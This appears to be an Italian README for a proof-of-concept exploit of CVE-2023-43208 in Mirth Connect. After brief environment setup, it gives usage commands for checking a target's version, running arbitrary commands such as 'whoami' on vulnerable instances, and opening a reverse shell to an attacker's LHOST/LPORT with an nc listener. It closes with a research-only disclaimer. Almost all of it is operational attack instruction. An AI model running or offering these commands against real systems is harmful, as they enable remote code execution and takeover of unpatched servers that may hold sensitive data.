
Script Python di prova di concetto che dimostra CVE‑2023‑43208 in Mirth Connect, consentendo controlli di versione ed esecuzione di comandi su istanze vulnerabili.
# Crea un ambiente virtuale pulito
python3 -m venv .venv
source .venv/bin/activate
# Installa le dipendenze fissate (pinned)
pip install -r requirements.txt
# Controlla solo la versione
python3 CVE-2023-43208.py -u https://TARGET/ --check
# Esegui un singolo comando
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# Reverse shell (avvia prima un listener nc)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
Questa proof‑of‑concept è fornita solo a scopo di ricerca e didattico. Non usarlo contro sistemi che non possiedi o per cui non hai esplicita autorizzazione di test. L'autore non è responsabile per eventuali usi impropri o danni causati da questo codice.